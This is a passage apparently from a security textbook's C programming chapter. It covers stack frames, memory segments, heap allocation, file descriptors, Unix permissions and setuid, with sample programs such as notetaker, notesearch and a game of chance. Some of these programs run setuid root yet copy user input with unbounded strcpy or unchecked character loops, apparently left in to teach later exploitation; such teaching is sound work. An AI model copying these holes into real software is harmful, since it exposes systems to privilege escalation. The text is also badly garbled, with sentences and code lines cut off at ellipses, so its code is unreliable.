Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stack_example
...

(gdb) print $ebp-12
$1 = (void *) 0xbffff7dc
(gdb) print $ebp-40
$2 = (void *) 0xbffff7c0
(gdb) x/16xw $esp
0xbffff7c0: 0x00000000 0x08049548 0xbffff7d8 0x08048249
0xbffff7d0: 0xb7f9f729 0xb7fd6ff4 0xbffff808 0x080483b9
0xbffff7e0: 0xb7fd6ff4 0xbffff89c 0xbffff808 0x0804838b
0xbffff7f0: 0x00000001 0x00000002 0x00000003 0x00000004
(gdb)

The stack frame is shown on the stack at the end
...
Above that is the saved frame pointer of
0xbffff808, which is what EBP was in the previous stack frame
...
Calculating
their relative addresses to EBP shows their exact locations in the stack frame
...
The extra space in the stack frame is just padding
...
If
another function were called within the function, another stack frame would be
pushed onto the stack, and so on
...
This
behavior is the reason this segment of memory is organized in a FILO data
structure
...
Since most
people are familiar with seeing numbered lists that count downward, the smaller
memory addresses are shown at the top
...
Most debuggers also display memory in this style, with the
smaller memory addresses at the top and the higher ones at the bottom
...
This minimizes wasted space, allowing the stack to
be larger if the heap is small and vice versa
...

Memory Segments in C
In C, as in other compiled languages, the compiled code goes into the text
segment, while the variables reside in the remaining segments
...
Variables that are defined outside of any functions are considered to be
global
...
If static or global variables are initialized with data, they
are stored in the data memory segment; otherwise, these variables are put in the
bss memory segment
...
Usually, pointers
are used to reference memory on the heap
...
Since the stack can contain
many different stack frames, stack variables can maintain uniqueness within
different functional contexts
...
c program will help explain
these concepts in C
...
c
#include ...

int stack_var; // Notice this variable has the same name as the one in main()
...

printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);
// These variables are in the bss segment
...

printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);
// These variables are in the stack segment
...
The global and static variables are declared as described earlier, and
initialized counterparts are also declared
...
The heap
variable is actually declared as an integer pointer, which will point to memory
allocated on the heap memory segment
...
Since the newly allocated memory could be of any data
type, the malloc() function returns a void pointer, which needs to be typecast
into an integer pointer
...
c
reader@hacking:~/booksrc $
...
out
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0
static_var is at address 0x080497f8
global_var is at address 0x080497fc

heap_var is at address 0x0804a008
stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hacking:~/booksrc $

The first two initialized variables have the lowest memory addresses, since they
are located in the data memory segment
...

These memory addresses are slightly larger than the previous variables'
addresses, since the bss segment is located below the data segment
...

The heap variable is stored in space allocated on the heap segment, which is
located just below the bss segment
...
Finally, the last two
stack_vars have very large memory addresses, since they are located in the stack
segment
...
This allows both
memory segments to be dynamic without wasting space in memory
...
The second stack_var in function() has its own unique context, so
that variable is stored within a different stack frame in the stack segment
...
Since the
stack grows back up toward the heap segment with each new stack frame, the
memory address for the second stack_var (0xbffff814) is smaller than the
address for the first stack_var (0xbffff834) found within main()'s context
...
However, using the heap requires a bit more effort
...
This function accepts a size as its only argument and reserves
that much space in the heap segment, returning the address to the start of this
memory as a void pointer
...
The
corresponding deallocation function is free()
...
These relatively simple functions are demonstrated in
heap_example
...

heap_example
...
h>

#include ...
h>
int main(int argc, char *argv[]) {
char *char_ptr; // A char pointer
int *int_ptr; // An integer pointer
int mem_size;
if (argc < 2) // If there aren't command-line arguments,
mem_size = 50; // use 50 as the default value
...
\n");
exit(-1);
}
strcpy(char_ptr, "This is memory is located on the heap
...
\n");
exit(-1);
}
*int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing
...
\n");
free(char_ptr); // Freeing heap memory
printf("\t[+] allocating another 15 bytes for char_ptr\n");
char_ptr = (char *) malloc(15); // Allocating more heap memory
if(char_ptr == NULL) { // Error checking, in case malloc() fails
fprintf(stderr, "Error: could not allocate heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
Then it uses the malloc() and free()
functions to allocate and deallocate memory on the heap
...
Since malloc() doesn't know what type of memory it's allocating, it
returns a void pointer to the newly allocated heap memory, which must be
typecast into the appropriate type
...
If the allocation
fails and the pointer is NULL, fprintf() is used to print an error message to
standard error and the program exits
...
This function will be explained more later, but for
now, it's just used as a way to properly display an error
...

reader@hacking:~/booksrc $ gcc -o heap_example heap_example
...
/heap_example
[+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

In the preceding output, notice that each block of memory has an incrementally
higher memory address in the heap
...
The heap allocation functions control this behavior,
which can be explored by changing the size of the initial memory allocation
...
/heap_example 100
[+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

If a larger block of memory is allocated and then deallocated, the final 15-byte
allocation will occur in that freed memory space, instead
...
Often, simple informative printf()
statements and a little experimentation can reveal many things about the
underlying system
...
c, there were several error checks for the malloc() calls
...
But with multiple malloc() calls, this error-checking code
needs to appear in multiple places
...
Since all the error-checking code is basically the same
for every malloc() call, this is a perfect place to use a function instead of
repeating the same instructions in multiple places
...
c for an example
...
c
#include ...
h>
#include ...

else
mem_size = atoi(argv[1]);
printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory
strcpy(char_ptr, "This is memory is located on the heap
...

printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);
printf("\t[-] freeing char_ptr's heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
\n");
exit(-1);
}
return ptr;
}

The errorchecked_heap
...
c code, except the heap memory allocation and error checking have
been gathered into a single function
...
This lets the
compiler know that there will be a function called errorchecked_malloc() that
expects a single, unsigned integer argument and returns a void pointer
...

The function itself is quite simple; it just accepts the size in bytes to allocate and
attempts to allocate that much memory using malloc()
...
This way, the custom
errorchecked_malloc() function can be used in place of a normal malloc(),
eliminating the need for repetitious error checking afterward
...

Building on Basics
Once you understand the basic concepts of C programming, the rest is pretty
easy
...
In fact, if the
functions were removed from any of the preceding programs, all that would
remain are very basic statements
...

File descriptors use a set of low-level I/O functions, and filestreams are a higher-level
form of buffered I/O that is built on the lower-level functions
...
In this book, the focus will be on the low-level I/O functions that use file
descriptors
...
Because this number
is unique among the other books in a bookstore, the cashier can scan the number
at checkout and use it to reference information about this book in the store's
database
...
Four common functions that use file descriptors are open(), close(),
read(), and write()
...
The
open() function opens a file for reading and/or writing and returns a file
descriptor
...
The file descriptor is passed as an argument to the other
functions like a pointer to the opened file
...
The read() and write() functions' arguments
are the file descriptor, a pointer to the data to read or write, and the number of
bytes to read or write from that location
...
These flags and their usage will be explained in depth later, but
for now let's take a look at a simple note-taking program that uses file descriptors
—simplenote
...
This program accepts a note as a command-line argument and
then adds it to the end of the file /tmp/notes
...
Other
functions are used to display a usage message and to handle fatal errors
...

simplenote
...
h>
#include ...
h>
#include ...
h>
void usage(char *prog_name, char *filename) {
printf("Usage: %s <data to add to %s>\n", prog_name, filename);
exit(0);
}
void fatal(char *); // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper
int main(int argc, char *argv[]) {
int fd; // file descriptor
char *buffer, *datafile;
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/tmp/notes");
if(argc < 2) // If there aren't command-line arguments,
usage(argv[0], datafile); // display usage message and exit
...

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] data file @ %p: \'%s\'\n", datafile, datafile);
strncat(buffer, "\n", 1); // Add a newline on the end
...
\n");
free(buffer);
free(datafile);
}
// A function to display an error message and then exit
void fatal(char *message) {
char error_message[100];
strcpy(error_message, "[!!] Fatal Error ");
strncat(error_message, message, 83);
perror(error_message);
exit(-1);
}
// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
void *ptr;
ptr = malloc(size);
if(ptr == NULL)
fatal("in ec_malloc() on memory allocation");

return ptr;
}

Besides the strange-looking flags used in the open() function, most of this code
should be readable
...
The strlen() function accepts a string and returns its length
...
The perror() function is short for print error and is used in fatal() to print
an additional error message (if it exists) before exiting
...
c
reader@hacking:~/booksrc $
...
/simplenote
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
great, it works
reader@hacking:~/booksrc $

The output of the program's execution is pretty self-explanatory, but there are
some things about the source code that need further explanation
...
h
and sys/stat
...
The first set of flags is found in fcntl
...
The access mode must use exactly one of the following three flags:
O_RDONLY Open file for read-only access
...

O_RDWR Open file for both read and write access
...
A few of the more common and useful of these flags are as follows:
O_APPEND Write data at the end of the file
...

O_CREAT Create the file if it doesn't exist
...

When two bits enter an OR gate, the result is 1 if either the first bit or the second
bit is 1
...
Full 32-bit values can use these bitwise operators to perform
logic operations on each corresponding bit
...
c and the
program output demonstrate these bitwise operations
...
c
#include ...

bit_b = (i & 1); // Get the first bit
...

bit_b = (i & 1); // Get the first bit
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
bitwise OR operator |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1
bitwise AND operator &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1
reader@hacking:~/booksrc $

The flags used for the open() function have values that correspond to single bits
...
The fcntl_flags
...
h and how they combine with each other
...
c
#include ...
h>
void display_flags(char *, unsigned int);
void binary_print(unsigned int);
int main(int argc, char *argv[]) {
display_flags("O_RDONLY\t\t", O_RDONLY);
display_flags("O_WRONLY\t\t", O_WRONLY);
display_flags("O_RDWR\t\t\t", O_RDWR);
printf("\n");
display_flags("O_APPEND\t\t", O_APPEND);
display_flags("O_TRUNC\t\t\t", O_TRUNC);
display_flags("O_CREAT\t\t\t", O_CREAT);

printf("\n");
display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}
void display_flags(char *label, unsigned int value) {
printf("%s\t: %d\t:", label, value);
binary_print(value);
printf("\n");
}
void binary_print(unsigned int value) {
unsigned int mask = 0xff000000; // Start with a mask for the highest byte
...

unsigned int byte, byte_iterator, bit_iterator;
for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
byte = (value & mask) / shift; // Isolate each byte
...

if(byte & 0x80) // If the highest bit in the byte isn't 0,
printf("1"); // print a 1
...

byte *= 2; // Move all the bits to the left by 1
...

shift /= 256; // Move the bits in shift right by 8
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
O_RDONLY : 0 : 00000000 00000000 00000000 00000000
O_WRONLY : 1 : 00000000 00000000 00000000 00000001
O_RDWR : 2 : 00000000 00000000 00000000 00000010
O_APPEND : 1024 : 00000000 00000000 00000100 00000000
O_TRUNC : 512 : 00000000 00000000 00000010 00000000
O_CREAT : 64 : 00000000 00000000 00000000 01000000
O_WRONLY|O_APPEND|O_CREAT : 1089 : 00000000 00000000 00000100 01000001
$

Using bit flags in combination with bitwise logic is an efficient and commonly used
technique
...
In
fcntl_flags
...
This technique only works when all the bits
are unique, though
...
This
argument uses bit flags defined in sys/stat
...

S_IRUSR Give the file read permission for the user (owner)
...

S_IXUSR Give the file execute permission for the user (owner)
...

S_IWGRP Give the file write permission for the group
...

S_IROTH Give the file read permission for other (anyone)
...

S_IXOTH Give the file execute permission for other (anyone)
...
If they don't make sense, here's a crash course in Unix file
permissions
...
These values can be displayed using ls -l
and are shown in the following output
...
c
reader@hacking:~/booksrc $

For the /etc/passwd file, the owner is root and the group is also root
...

Read, write, and execute permissions can be turned on and off for three different
fields: user, group, and other
...

These fields are also displayed in the front of the ls -l output
...
The next three characters display the group permissions,
and the last three characters are for the other permissions
...

Each permission corresponds to a bit flag; read is 4 (100 in binary), write is 2
(010 in binary), and execute is 1 (001 in binary)
...
These values can be added together to define
permissions for user, group, and other using the chmod command
...
c
reader@hacking:~/booksrc $ ls -l simplenote
...
c
reader@hacking:~/booksrc $ chmod ugo-wx simplenote
...
c
-r-------- 1 reader reader 1826 2007-09-07 02:51 simplenote
...
c
reader@hacking:~/booksrc $ ls -l simplenote
...
c

reader@hacking:~/booksrc $

The first command (chmod 731) gives read, write, and execute permissions to the
user, since the first number is 7 (4 + 2 + 1), write and execute permissions to
group, since the second number is 3 (2 + 1), and only execute permission to
other, since the third number is 1
...
In the next chmod command, the argument ugo-wx means "subtract
write and execute permissions from user, group, and other"
...

In the simplenote program, the open() function uses S_IRUSR|S_IWUSR for its
additional permission argument, which means the /tmp/notes file should only have
user read and write permission when it is created
...
This user ID can be
displayed using the id command
...
The su command can be used to switch to a different user,
and if this command is run as root, it can be done without a password
...
On the LiveCD,
sudo has been configured so it can be executed without a password, for
simplicity's sake
...

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

As the user jose, the simplenote program will run as jose if it is executed, but it
won't have access to the /tmp/notes file
...

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $
...
For example, the /etc/passwd file contains account information for
every user on the system, including each user's default login shell
...
This program needs to
be able to make changes to the /etc/passwd file, but only on the line that pertains
to the current user's account
...
This is an additional file permission bit that can be set
using chmod
...

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root 1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

The chsh program has the setuid flag set, which is indicated by an s in the ls
output above
...
The
/etc/passwd file that chsh writes to is also owned by root and only allows the
owner to write to it
...
This means that a running
program has both a real user ID and an effective user ID
...
c
...
c
#include ...
c are as follows
...
c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
c, both user IDs are shown to be 999 when uid_demo is
executed, since 999 is the user ID for reader
...
The
program can still be executed, since it has execute permission for other, and it
shows that both user IDs remain 999, since that's still the ID of the user
...
/uid_demo
chmod: changing permissions of `
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
The chmod u+s command turns on the setuid permission,
which can be seen in the following ls -l output
...
This is how the chsh program is able to allow any user to
change his or her login shell stored in /etc/passwd
...
The next
program will be a modification of the simplenote program; it will also record the
user ID of each note's original author
...

The ec_malloc() and fatal() functions have been useful in many of our
programs
...

hacking
...
h, the functions can just be included
...
If the filename is surrounded by
quotes, the compiler looks in the current directory
...
h is in
the same directory as a program, it can be included with that program by typing
#include "hacking
...

The changed lines for the new notetaker program (notetaker
...

notetaker
...
h>
#include ...
h>
#include ...
h>
#include "hacking
...

strcpy(buffer, argv[1]); // Copy into buffer
...

// Writing data
if(write(fd, &userid, 4) == -1) // Write user ID before note data
...

if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
The getuid() function is used to get the real
user ID, which is written to the datafile on the line before the note's line is
written
...

reader@hacking:~/booksrc $ gcc -o notetaker notetaker
...
/notetaker
reader@hacking:~/booksrc $ sudo chmod u+s
...
/notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48
...
/notetaker "this is a test of multiuser notes"
[DEBUG] buffer @ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
Now when the program is
executed, the program runs as the root user, so the file /var/notes is also owned
by root when it is created
...
this is a t|
00000010 65 73 74 20 6f 66 20 6d 75 6c 74 69 75 73 65 72 |est of multiuser|
00000020 20 6e 6f 74 65 73 0a | notes
...
Because of little-endian architecture, the 4 bytes of the integer 999 appear
reversed in hexadecimal (shown in bold above)
...
The notesearch
...
Additionally, an optional
command-line argument can be supplied for a search string
...

notesearch
...
h>
#include ...
h>
#include ...
h"
#define FILENAME "/var/notes"
int print_notes(int, int, char *); // Note printing function
...

int search_note(char *, char *); // Search for keyword function
...

userid = getuid();
fd = open(FILENAME, O_RDONLY); // Open the file for read-only access
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0
...

note_buffer[note_length] = 0; // Terminate the string
...

return 1;
}
// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note
...

if(read(fd, &note_uid, 4) != 4) // Read the uid data
...

if(read(fd, &byte, 1) != 1) // Read the newline separator
...

if(read(fd, &byte, 1) != 1) // Read a single byte
...

length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes
...

int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0) // If there is no search string,
return 1; // always "match"
...

if(note[i] == keyword[match]) // If byte matches keyword,
match++; // get ready to check the next byte;
else { // otherwise,
if(note[i] == keyword[0]) // if that byte matches first keyword byte,
match = 1; // start the match count at 1
...

}
if(match == keyword_length) // If there is a full match,
return 1; // return matched
...

}

Most of this code should make sense, but there are some new concepts
...
Also, the function lseek() is used to rewind the read position in the file
...
Since
this turns out to be a negative number, the position is moved backward by length
bytes
...
c
reader@hacking:~/booksrc $ sudo chown root:root
...
/notesearch
reader@hacking:~/booksrc $
...
But
this is just a single user; what happens if a different user uses the notetaker and
notesearch programs?
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $
...

jose@hacking:/home/reader/booksrc $
...
This means that
value is added to all notes written with notetaker, and only notes with a matching
user ID will be displayed by the notesearch program
...
/notetaker "This is another note for the reader user"
[DEBUG] buffer @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]-------
reader@hacking:~/booksrc $

Similarly, all notes for the user reader have the user ID 999 attached to them
...

This is very similar to how the /etc/passwd file stores user information for all
users, yet programs like chsh and passwd allow any user to change his own shell
or password
...
In C, structs are variables that can contain many other variables
...

A simple example will suffice for now
...
h
...

struct tm {
    int tm_sec;   /* seconds */
    int tm_min;   /* minutes */
    int tm_hour;  /* hours */
    int tm_mday;  /* day of the month */
    int tm_mon;   /* month */
    int tm_year;  /* year */
    int tm_wday;  /* day of the week */
    int tm_yday;  /* day in the year */
    int tm_isdst; /* daylight saving time */
};

After this struct is defined, struct tm becomes a usable variable type, which can
be used to declare variables and pointers with the data type of the tm struct
...
c program demonstrates this
...
h is included, the tm
struct is defined, which is later used to declare the current_time and time_ptr
variables
...
c
#include ...
h>
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, day, month, year;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

Time on Unix systems is kept relative to this rather arbitrary point in time, which
is also known as the epoch
...
The pointer time_ptr has already been set to the address of
current_time, an empty tm struct
...
The elements of structs can be accessed in
three different ways; the first two are the proper ways to access struct elements,
and the third is a hacked solution
...
Therefore, current_time
...
Pointers to structs are often used, since it is
much more efficient to pass a four-byte pointer than an entire data structure
...
When
using a struct pointer like time_ptr, struct elements can be similarly accessed by
the struct element's name, but using a series of characters that looks like an
arrow pointing right
...
The seconds could be
accessed via either of these proper methods, using the tm_sec element of the tm
struct, but a third method is used
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

The program works as expected, but how are the seconds being accessed in the
tm struct? Remember that in the end, it's all just memory
...

In the line second = *((int *) time_ptr), the variable time_ptr is typecast
from a tm struct pointer to an integer pointer
...
Since the address to
the tm struct also points to the first element of this struct, this will retrieve the
integer value for tm_sec in the struct
...
c code (time_example2
...
This shows that the elements of tm struct are right next to each
other in memory
...

time_example2
...
h>

#include ...

printf("\n");
}
printf("\n");
}
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, i, *int_ptr;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

int_ptr = (int *) time_ptr;
for(i=0; i < 3; i++) {
printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
} // since an int is 4 bytes in size
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $

While struct memory can be accessed this way, assumptions are made about the
type of variables in the struct and the lack of any padding between variables
...

Function Pointers
A pointer simply contains a memory address and is given a data type that describes
where it points
...
The funcptr_example
...

funcptr_example
...
h>
int func_one() {
    printf("This is function one\n");
    return 1;
}
int func_two() {
    printf("This is function two\n");
    return 2;
}
int main() {
    int value;
    int (*function_ptr) ();
    function_ptr = func_one;
    printf("function_ptr is 0x%08x\n", function_ptr);
    value = function_ptr();
    printf("value returned was %d\n", value);
    function_ptr = func_two;
    printf("function_ptr is 0x%08x\n", function_ptr);
    value = function_ptr();
    printf("value returned was %d\n", value);
}

In this program, a function pointer aptly named function_ptr is declared in
main()
...
The output below shows the
compilation and execution of this source code
...
c
reader@hacking:~/booksrc $
...
out
function_ptr is 0x08048374
This is function one
value returned was 1
function_ptr is 0x0804838d
This is function two
value returned was 2

reader@hacking:~/booksrc $

Pseudo-random Numbers
Since computers are deterministic machines, it is impossible for them to produce
truly random numbers
...

The pseudo-random number generator functions fill this need by generating a
stream of numbers that is pseudo-random
...
Deterministic
machines cannot produce true randomness, but if the seed value of the
pseudo-random generation function isn't known, the sequence will seem random
...
These functions and RAND_MAX are defined in stdlib
...
While the
numbers rand() returns will appear to be random, they are dependent on the
seed value provided to srand()
...
One common practice is to use the number of seconds since
epoch (returned from the time() function) as the seed
...
c
program demonstrates this technique
...
c
#include ...
h>
int main() {
    int i;
    printf("RAND_MAX is %u\n", RAND_MAX);
    srand(time(0));
    printf("random values from 0 to RAND_MAX\n");
    for(i=0; i < 8; i++)
        printf("%d\n", rand());
    printf("random values from 1 to 20\n");
    for(i=0; i < 8; i++)
        printf("%d\n", (rand()%20)+1);
}

Notice how the modulus operator is used to obtain random values from 1 to 20
...
c
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
815015288
1315541117
2080969327
450538726
710528035
907694519
1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

The program's output just displays random numbers
...

A Game of Chance
The final program in this section is a set of games of chance that use many of the
concepts we've discussed
...
It has three different game functions,
which are called using a single global function pointer, and it uses structs to hold
data for the player, which is saved in a file
...
The
game_of_chance
...

game_of_chance
...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#define DATAFILE "/var/chance
...

if(get_player_data() == -1) // Try to read player data from file
...

while(choice != 7) {
printf("-=[ Game of Chance Menu ]=-\n");
printf("1 - Play the Pick a Number game\n");
printf("2 - Play the No Match Dealer game\n");
printf("3 - Play the Find the Ace game\n");
printf("4 - View current high score\n");
printf("5 - Change your user name\n");
printf("6 - Reset your account at 100 credits\n");
printf("7 - Quit\n");
printf("[Name: %s]\n", player
...
credits);
scanf("%d", &choice);
if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set
if(choice == 1) // then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game(); // Play the game
...
\n\n");
}
else if (choice == 6) {
printf("\nYour account has been reset with 100 credits
...
credits = 100;
}
}
update_player_data();
printf("\nThanks for playing! Bye
...
It returns -1 if it is unable to find player
// data for the current uid
...

while(entry
...

read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading
...

if(read_bytes < sizeof(struct user)) // This means that the end of file was reached
...

return 1; // Return a success
...

// It will create a new player account and append it to the file
...
uid = getuid();
player
...
credits = 100;

fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in register_new_player() while opening file");
write(fd, &player, sizeof(struct user));
close(fd);
printf("\nWelcome to the Game of Chance %s
...
name);
printf("You have been given %u credits
...
credits);
}
// This function writes the current player data to the file
...

void update_player_data() {
int fd, i, read_uid;
char burned_byte;
fd = open(DATAFILE, O_RDWR);
if(fd == -1) // If open fails here, something is really wrong
...

while(read_uid != player
...

for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
read(fd, &burned_byte, 1); // rest of that struct
...

}
write(fd, &(player
...

write(fd, &(player
...

write(fd, &(player
...

close(fd);
}
// This function will display the current high score and
// the name of the person who set that high score
...

if(entry
...
highscore; // set top_score to that score
strcpy(top_name, entry
...

}
}
close(fd);
if(top_score > player
...
highscore);
printf("======================================================\n\n");
}
// This function simply awards the jackpot for the Pick a Number game
...
credits += 100;
}
// This function is used to input the player name, since
// scanf("%s", &whatever) will stop input at the first space
...

name_ptr = (char *) &(player
...

*name_ptr = input_char; // Put the input char into name field
...

name_ptr++; // Increment the name pointer
...

}
// This function prints the 3 cards for the Find the Ace game
...
If the user_pick is
// -1, then the selection numbers are displayed
...
_
...
_
...
_
...
It expects the available credits and the
// previous wager as arguments
...
The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise
...

printf("Nice try, but you must wager a positive number!\n");
return -1;
}
total_wager = previous_wager + wager;
if(total_wager > available_credits) { // Confirm available credits
printf("Your total wager of %d is more than you have!\n", total_wager);
printf("You only have %d available credits, try again
...
It also writes the new credit totals to file
// after each game is played
...
current_game);
if(player
...
credits > player
...
highscore = player
...

printf("\nYou now have %u credits\n", player
...

printf("Would you like to play again? (y/n) ");
selection = '\n';
while(selection == '\n') // Flush any extra newlines
...

}
}
// This function is the Pick a Number game
...

int pick_a_number() {
int pick, winning_number;
printf("\n####### Pick a Number ######\n");
printf("This game costs 10 credits to play
...

if(player
...
That's not enough to play!\n\n", player
...
credits -= 10; // Deduct 10 credits
...
\n");
printf("Pick a number between 1 and 20: ");
scanf("%d", &pick);
printf("The winning number is %d\n", winning_number);
if(pick == winning_number)
jackpot();
else
printf("Sorry, you didn't win
...

// It returns -1 if the player has 0 credits
...
\n");
printf("The dealer will deal out 16 random numbers between 0 and 99
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager == -1)
wager = take_wager(player
...

printf("%2d\t", numbers[i]);
if(i%8 == 7) // Print a line break every 8 numbers
...

j = i + 1;
while(j < 16) {
if(numbers[i] == numbers[j])
match = numbers[i];
j++;
}
}
if(match != -1) {
printf("The dealer matched the number %d!\n", match);
printf("You lose %d credits
...
credits -= wager;
} else {
printf("There were no matches! You win %d credits!\n", wager);
player
...

// It returns -1 if the player has 0 credits
...

printf("******* Find the Ace *******\n");
printf("In this game, you can wager up to all of your credits
...
\n");
printf("If you find the ace, you will win your wager
...
\n");
printf("At this point, you may either select a different card or\n");
printf("increase your wager
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");

return -1;
}

while(wager_one == -1) // Loop until valid wager is made
...
credits, 0);
print_cards("Dealing cards", cards, -1);
pick = -1;
while((pick < 1) || (pick > 3)) { // Loop until valid pick is made
...

i=0;
while(i == ace || i == pick) // Keep looping until
i++; // we find a valid queen to reveal
...

printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
printf("Select c or i: ");
choice_two = '\n';
while(choice_two == '\n') // Flush extra newlines
...

invalid_choice=0; // This is a valid choice
...

wager_two = take_wager(player
...

i = invalid_choice = 0; // Valid choice
while(i == pick || cards[i] == 'Q') // Loop until the other card
i++; // is found,
pick = i; // and then swap pick
...

if(ace == i)
cards[i] = 'A';
else
cards[i] = 'Q';
}
print_cards("End result", cards, pick);

if(pick == ace) { // Handle win
...
credits += wager_one;
if(wager_two != -1) {
printf("and an additional %d credits from your second wager!\n", wager_two);
player
...

printf("You have lost %d credits from your first wager\n", wager_one);
player
...
credits -= wager_two;

}
}
return 0;
}

Since this is a multi-user program that writes to a file in the /var directory, it must
be suid root
...
c
